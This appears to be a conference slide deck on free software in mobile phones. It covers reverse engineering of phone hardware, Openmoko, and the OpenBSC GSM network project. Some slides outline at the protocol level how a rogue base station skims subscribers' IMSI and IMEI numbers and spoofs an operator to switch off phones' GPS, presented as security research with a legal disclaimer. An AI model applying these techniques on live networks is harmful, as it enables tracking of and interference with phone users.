%include "default.mgp" %default 1 bgrad %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %nodefault %back "blue" %center %size 7 Free and Open Source Software in the Mobile World %center %size 4 by Harald Welte netfilter.org / openmoko.org / openpcd.org gpl-violations.org / openezx.org / gnufiish.org berlin.ccc.de / openBSC.gnumonks.org deDECTed.org / hmw-consulting.de / viatech.com %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Introduction Who is speaking to you? an independent Free Software developer, consultant and trainer 15 years experience using/deploying and developing for Linux on server and workstation 12 years professional experience doing Linux system + kernel level development strong focus on network security and embedded expert in Free and Open Source Software (FOSS) copyright and licensing digital board-level hardware design, esp. embedded systems active developer and contributor to many FOSS projects thus, a techie, who will therefore not have fancy animated slides ;) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Why? Why? For the same reason you have FOSS in other areas You can run a 100% FOSS Personal Computer / Laptop The majority of all consumer electronics network gear runs Linux DSL-Router, WiFi Access Point, Network Attached Storage To enable people to exercise the core freedoms to study and understand the software to share the software with others to modify, and run + share modified versions Because the mobile world is 100% proprietary and anti-competitive %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The closed Mobile World Compare the Mobile world with the PC world In the PC world you buy some more or less standardized hardware you have the freedom to install whatever OS on it you have the freedom to install whatever Apps on it you can run it 100% based on FOSS and get the freedoms you connect to communications networks with (dsl-)modem the network protocol stack (TCP/IP, WiFi, ISDN) runs on the PC %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The closed Mobile World Compare the Mobile world with the PC world In the Mobile world you buy some product (mobile phone) the product ships with pre-installed OS and Apps the manufacturer does everything to prevent you from installing a OS of your choice there is no single product/solution based on 100% FOSS the network protocol stack (GSM/GPRS/UMTS) runs in proprietary firmware %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The closed Mobile World It gets even worse.... The phone maker and/or operator have remote control over reading/writing entries of your phonebook making your phone send SMS making your phone place phone calls update/change the software over the air (FOTA) preventing you from using the bluetooth/USB interface the way you want transfer ringtones, make backups, tethering %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The closed Mobile World So the end result You buy a product for _a lot_ of money... ... but you don't _own_ the product. The manufacturer or operator does So why should you pay money? If it is yours, you decide what it does or doesn't do. If the operators want to own the phone, they should rent it to you, not sell it. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World How can we free the phone We can free the mobile phone world by: building more open hardware hard, since most chips/components are very FOSS unfriendly developing FOSS based OS/middleware/applications easily possible, but hard without open hardware developing a FOSS GSM protocol stack extremely hard, tight NDA's and business conduct basically prevent anyone from entering the market %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World How can we free the phone FOSS for mobile phones HTC-Linux / xda-developers project reverse-engineering of HTC smartphones OpenEZX.org reverse-engineering Motorola EZX and MAGX phones gnufiish.org reverse-engineering E-TEN glofiish phones openmoko.org designing and building open, FOSS-friendly phones %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Reverse Engineering Reverse Engineering projects are always late they start after the product ships is getting harder and harder many new System-on-a-Chip have docs under NDA frequent use of FPGA or CPLD or custom ASIC cryptographic signatures in boot loader very rarely have a big impact the software might be complete when hardware is end-of-life %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Reverse Engineering How to find such a Linux-friendly device? Look at hardware details of available devices Use Google to find out what hardware they use Use FCC database to get PCB photographs Look at WM firmware images (registry/...) At some point you buy one and take it apart %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Linux-friendly hardware I went through this process I found the E-TEN glofiish devices They are very similar to Openmoko Samsung S3C2442 SoC MCP with NAND+SDRAM TD028TTEC1 full-VGA LCM Other hardware parts reasonably supported/known Marvell 8686/libertas WiFi (SPI attached) SiRF GPS (UART attached) CSR Bluetooth (UART attached) Only some unknown parts CPLD for power management and kbd matrix Ericsson GSM Modem (AT commandset documented!) Cameras (I don't really care) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Project gnufiish Project 'gnufiish' Port Linux to the E-TEN glofiish devices Initially to the M800 and X800 Almost all glofiish have very similar hardware Openmoko merges all my patches in their kernel! Official inclusion to Openmoko distribution %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Project gnufiish gnufiish Status Kernel (2.6.24/2.6.27) booted on _first attempt_ Working I2C host controller I2C communication to CPLD and FM Radio USB Device mode (Ethernet gadget) Touchscreen input LCM Framebuffer LCM Backlight control GPS and Bluetooth power control GPIO buttons In the works Audio Codec driver (50% done) GSM Modem (SPI) driver (80% done) M800 Keyboard + Capsense driver (25% done) SPI glue to libertas WiFi driver (70% done) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World HOWTO How was this done? Various reverse engineering techniques Take actual board apart, note major components Use HaRET (hardwar reverse engineering tool) Find + use JTAG testpads Find + use serial console Disassemble WinMobile drivers %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Take hardware apart Opening the case and void your warranty %image "x800_backside_nobat_nocover.jpg" Note the convenient test pads beneath the battery %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Take hardware apart Opening the case %image "x800_opening_the_case.jpg" 800x600 If you have a bit of experience in taking apart devices, you can do that without any damage... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Take hardware apart The Mainboard with all its shielding covers %image "x800_mainboard_with_shielding.jpg" 800x600 Obvoiusly, the shielding needs to go %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Take hardware apart The application processor section %image "x800_application_processor.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Take hardware apart The HSDPA modem section %image "x800_hsdpa_modem.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Take hardware apart The backside %image "x800_backside_with_lcm.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World JTAG pins Find + use JTAG testpads JTAG is basically a long shift register Input, Output, Clock (TDI, TDO, TCK) Therefore, you can try to shift data in and check if/where it comes out Automatized JTAG search by project "jtagfinder" by Hunz (German CCC member) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World JTAG pins Find + use JTAG testpads %image "x800_dbgconn_closeup.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World JTAG pins Find + use JTAG testpads %image "x800_debcon_pcb.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World JTAG pins Find + use JTAG testpads %image "x800_jtagfinder_probes.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World JTAG pins Find + use JTAG testpads %image "x800_jtagfinder.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World JTAG pins Found JTAG pins Chain 1 Samsung S3C2442 Application Processor Has standard ARM JTAG ICE Chain 2 CPLD programming interface Remaining work find the nTRST and nSRST pins %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Serial console How to find the serial console Just run some code that you think writes to it Use a Scope to find typical patterns of a serial port I haven't actually done (or needed) this on the glofiish yet, but on many other devices RxD pin is harder to find, just trial+error usually works as soon as you have some interactive prompt that echo's the characters you write Don't forget to add level shifter from 3.3/5V to RS232 levels %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World What's HaRET What is HaRET a Windows executable program for any WinCE based OS offers a control interface on a TCP port connect to it using haretconsole (python script) on Linux PC supports a number of popular ARM based SoC (PXA, S3C, MSM) features include GPIO state and tracing MMIO read/write virtual/physical memory mapping IRQ tracing (by redirecting IRQ vectors) load Linux into ram and boot it from within WinCE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Using HaRET Using HaRET run the program on the target device connect to it using haretconsole over USB-Ethernet read GPIO configuration Create GPIO funciton map based on SoC data sheet watch for GPIO changes remove the signal from the noise exclude unitneresting and frequently changing GPIOs watch for GPIO changes while performing certain events press every button and check start/stop peripherals insert/eject SD card %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Using HaRET Using HARET watch for IRQ changes/events e.g. you see DMA3 interrupts while talking to the GSM read MMIO config of DMA controller to determine user: SPI read SPI controller configuration + DMA controller configuration find RAM address of data buffers read/written by DMA haretconsole writes logfiles you can start to annotate the logfiles of course, all of this could be done using JTAG, too. but with HaRET, you mostly don't need it!!! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Disassembling WinCE drivers Disassembling WinCE drivers is the obvious thing to do, right? is actually not all that easy, since WinCE doesn't allow you to read the DLLs not via ActiveSync neither WinCE filesystem API's Apparently, they are pre-linked and not real files anymore luckily, there are tools in the 'ROM cooking' scene hundreds of different tools, almost all need Windows PC therefore, not useful to me conclusion: Need to understand the ROM image format %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Disassembling WinCE ROM files Disassembling WinCE ROM files 'datextract' to extract different portions like OS image 'x520.pl' to remove spare NAND OOB sectors from image and get a file split resulting image in bootsplash, cabarchive and disk image 'xx1.pl' to split cabarchive into CAB files 'partextract' to split disk image in partitions 'SRPX2XIP.exe' (wine) to decompress XPRS compressed partition0+1 'dumpxip.pl' to dump/recreate files in partition0 and 1 'ImgfsToDump.exe' to dump/recreate files in partition2 (imagefs) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Disassembling WinCE Drivers Disassembling WinCE Drivers Now we finally have the re-created DLL's with the drivers Use your favourite debugger/disassembler to take them apart I'm a big fan of IDA (Interactive Disassembler) The only proprietary software that I license+use in 15 years There's actually a Linux x86 version Was even using it with qemu on my Powerbook some years back %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World WinCE Registry WinCE has a registry, too I never really understood what this registry is all about, but it doesn't matter ;) You can use 'synce-registry' to dump it to Linux Contains important information about how drivers are interconnected various configuration parameters of drivers %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko %center %size 7 OpenMoko %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko WARNING While I have been the Lead System Architect for hardware and system level software, throughout the first 16 months of the project, I have quit working for OpenMoko, Inc. or the FIC group in November 2007. Thus, I do not officially represent either of these entities! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko What is OpenMoko The commercial side OpenMoko, Inc., ("OpenMoko, the Company") Doing the actual hardware development Funding the OpenMoko software R&D Responsible for product definition, sales, marketing, PR, ... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko What is OpenMoko The community side OpenMoko, the overall Free Software project A FOSS project working on OpenMoko kernel/u-boot patches (hardware support) OpenMoko GNU/Linux distribution OpenMoko UI / framework Funded by OpenMoko, Inc. OpenMoko, the embedded GNU/Linux distribution An OE-built embedded GNU/Linux distribution for mobile communications devices Primarily targetted at OpenMoko/FIC handsets Is being ported to other devices by the community Maintained by OE coreteam member employed by OpenMoko, Inc. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko What is OpenMoko about? Open Opening up the formerly-closed mobile world on any achievable level Mobile Mobile devices are the future Free 100% Free Software from driver through UI %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Neo1973 GTA01 hardware Neo1973 GTA01 hardware (2007) S3C2410 SoC @ 266MHz 2.8" 480x640 LCM, 262k colors 128MB SDRAM 64MB SLC NAND (512/16k) USB 1.1 device and host (unpowered) A-GPS (without processor) GSM+GPRS chipset (ARM7 based) Wolfson audio codec 2 stereo speakers (1.2W) 2.5mm headset jack CSR4 based Bluetooth NXP PCF50606 power management unit %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Neo1973 GTA02 hardware Neo1973 GTA02 hardware (2008) S3C2442B SoC @ 400 MHz (500MHz option) 2.8" 480x640 LCM, 262k colors 128MB SDRAM 256MB SLC NAND (2048/128k) USB 1.1 device and host (with power) A-GPS (fully autonomous firmware-based) GSM+GPRS chipset (Ti Calypso, ARM7 based) CSR4 based Bluetooth Atheros AR6k based 802.11b/g WiFi 2 3D accelerometers Smedia Glamo 3362 GPU NXP PCF50633 power management unit %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Hackable Device Hackable Device Standards compliance wherever possible The device shall be under full user control Everyone should be able to hack it, at any level Make entry barrier for development as easy as possible bootloader prompt via USB serial emulation Serial console JTAG for the people Provide Debug Board with embedded USB JTAG + serial adapter %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko User control User control The phone needs to be under control of the user, and the free software he uses Even backdoors or rogue GSM firmware shall not be able to intrude the privacy fo the user So we e.g. put the Audio codec (under explicit control from the Linux-running AP) between microphone/speaker and the GSM modem So we enable the Linux-running AP to cut power of the GSM modem Thus, free software (and thus the user) remains in ultimate control %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Hackable at any level Hardware Hacking we even encourage hardware hacking I2C, SPI, GPIO and IRQ line on documented test pads and connector allows for attachment of new peripherals to the device even the hardware schematics available under FOSS-permissive NDA %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Hackable at any level System-level hacking (bootloader, OS) entire bootloader from very first instruction FOSS entire kernel including all drivers FOSS JTAG accessible on debug connector serial console on debug connector debug board (USB JTAG adaptor and USB serial converter) un-brickable through emergency boot loader in read-only NOR flash (GTA02) DFU (Device Firmware Upgrade) for full-system re-flash via USB %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Hackable at any level Userspace and UI level hacking entire userspace world FOSS (libraries, daemons, UI, X driver, ...) FOSS build system and toolchain/SDK enable anyone to build custom softwar packages and/or flash images provide a programming environment as close as possible to the Linux desktop world allow developers to re-use their existing Linux development skills %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko GSM Integration But you can't hack the GSM stack yes, that is true. pretty much like you can't hack the firmware of your SCSI or RAID controller, WiFi card, Bluetooth chipset, etc. even the firmware of a good old analogue phone line (voice) modem was not hackable having proprietary firmware on a dedicated peripheral CPU is even acceptable to the FSF! And no doubt, anyone inside OpenMoko would love to ever have a open source GSM stack. Patches welcome :) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko GSM Integration But you can't hack the GSM stack so you get the maximum level of freedom that you can get with any other peripheral device: open source low-level (mux, power mgmt) drivers open source high-level drivers (gsm daemon) openly documented serial protocol (TS 07.05, 07.07, 07.10) asking for more freedom on the GSM side is hypocritical when accepting the very same level with other peripheral devices. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko GSM Integration But you can't hack the GSM stack besides that GTA01 has baseband JTAG on test pins OpenMoko does not cryptographically sign GSM firmware images GSM firmware is user-upgradable %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenMoko Difference Difference from other Linux phones 'others' discourage third parties from writing apps you need explicit permission? WTF! 'others' try to make customers pay for a device that's still under manufacturer / GSM operator control 'others' use proprietary kernel modules locks you into some old kernel version 'others' use proprietary bootloaders 'others' dont give you JTAG/serial access 'others' use proprietary UI toolkits vendor lock-in 'others' dont give out their build system 'others' dont give out their firmware update tools %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS for the Mobile World %center %size 7 FOSS for the GSM network side %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS for the Mobile World Why FOSS for the network side? Why? For the same reason you might run other networks To learn and experiment with technology To boldly go where no [free] man has gone before ;) Practical demonstration of known GSM security problems Raise public awareness abut GSM [in]security thus increase the incentive for the market to improve %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Legal Disclaimer Legal Disclaimer Don't try this at home! GSM operates on LICENSED spectrum Thus, you need approval from the regulatory authority Only use BTS with dummy load! Don't interfere with the operators! Our software is strictly for research purpose only %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World GSM Network Architecture The Hitchhikers Guide to the GSM Network unfortunately does not exist The GSM related literature is typically too high-level The GSM protocol specifications are publicly available but _very_ comprehensive (1,108 PDFs, 414MByte) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World GSM Network Architecture GSM is a bit-synchronous network it draws many analogies from ISDN and SDN layer 2 modelled after Q.921 / LAPD call signalling modelled Q.931 but: many more protocols for mobility management, radio resources, ... like all traditional Telco protocols: Intelligence in the network, not in the end nodes. GSM is a TDMA "nightmare" e.g. you never know from/for whom data is without the timing context %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World GSM Network Architecture MS Mobile Station (your Phone) BTS Base Transceiver Station BSC Base Station Controller MSC Mobile Switching Center HLR/VLR Home/Visitor Location Register %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World GSM Base Transceiver Station BTS As the name indicates "transceiver" Handles Layer 1 and some parts of RF layer2 Modulation/Demodulation Time Multiplex, scheduling of frames Is not a "Base Station", i.e. not self-contained True 'slave' to the BSC %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World GSM Base Station Controller BSC Base Station Controller Handles most of the actual decision making really controls most aspects of BTSs handles intra-BSC cell handover %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World GSM A-bis interface BSC <-> BTS Interface is called A-bis has the following control layers on E1 TS1 L2ML (Layer 2 Management) TEI management similar to ISDN OML (Organization & Maintenance) System parameters, events RSL (Radio Subsystem Layer) has encoded voice data (TRAU frames) on other E1 TS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The Siemens BS-11 microBTS Siemens BS-11 microBTS plain old 2G (GSM voice calls, CSD) one or two TRX, 30mW to 2W each, GSM900 two E1 interfaces (for daisy-chaining) documentation under NDA, but 99.9% of the A-bis protocol available from GSM specs See TS 04.08 (RLL), 12.21 (OML), 08.58 (RSL) RS232 serial port for Local Maintenance Terminal LMT software proprietary under NDA not needed for operation of the BTS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The Siemens BS-11 microBTS %image "1_small.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World The Siemens BS-11 microBTS First steps with the Siemens BS-11 Harald bought a BS-11 on e-Bay in 2006 Started to read some specs (08.5x) about A-bis Started to build cables for E1 and power Bought HFC-E1 PCI card Bought Elmi EGM35 Abis analyzer (e-Bay once again) Contacted with other people who also bought BS-11 Found somebody who could provide Abis traces Never really had time due to Openmoko and other projects %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World OpenBSC OpenBSC (12/2008) get L2ML to work with mISDN mainline mISDN doesn't deal with multiple SAPIs and fixed TEI learn how new sockets-based mISDN API works come up with event-driven architecture, single sleect loop, no threads, ... At 25C3: add libdbi/sqlite database for "HLR" get paging to work, support for configurable network ID debugging + stabilization with > 1000 test users ;) IMSI + IMEI skimming %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Work at 25C3 IMSI+IMEI skimming very simple: phones with automatic network selection pick strongest network they send LOCATION UPDATE REQUEST we send IDENTITY REQUEST IMSI + IMEISV they send IMSI + IMEISV we store this in the databasa and then send LOCATION UPDATE REJECT %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Work at 25C3 Mobile Originated Call once a MS is registered, we can dial a number from the MS allocate and establish a TCH/F deal with the Signalling and get into Connect unfortunately, code for handling voice streams not finished %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Work at 25C3 Mobile Originated SMS once a MS is registered, we can send a SMS parse + acknowledge SMS PDU data %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Work at 25C3 The Egypt simulation apparently GPS is illegal in mobile phones in Egypt "Egypt detection" implemented by checking if any surrounding cells are with Egypt country code phones don't even have to register to our BTS! so if we claim to be e.g. MobiNil, phones will shut off their GPS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Other GSM related FOSS Other GSM related FOSS OpenBTS 100% Software Defined Radio bsed on USRP + gnuradio implements entire RF+layer1/2/3 and interfacing to SIP/Asterisk much more than just a BTS!! some code overlap with OpenBSC %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Other GSM related FOSS THC GSM project now converging into airprobe.org working on a protocol analyzer / sniffer for GSM Um Air interface slow progress, only few people understand the technology but it's actually not all that hard, just needs time and motivation %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Links OpenBSC http://openbsc.gnumonks.org/ 3GPP / ETSI GSM Specs http://www.3gpp.org/ Priv-Doz. Dr.-Ing Joachim Goeller http://www2.informatik.hu-berlin.de/~goeller THC GSM Wiki http://wiki.thc.org/gsm OpenBTS http://gnuradio.org/trac/wiki/OpenBTS Harald's branch of gsm-tvoid, etc git://git.gnumonks.org/gsm.git %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FOSS in the Mobile World Thanks Thanks to The FSF and Richard Stallman for the GPL which e.g. enabled us to get the kernel source for the EZX phones Openmoko, Inc. for their work on Freeing the mobile world The ETSI/3GPP for having all their specifications online zecke, alphaone, Stefan for their work on OpenBSC W. for his extensive A-bis protocol traces and MA-10 Netzing AG for funding my OpenBSC work Pablo for inviting me to this conference in Seville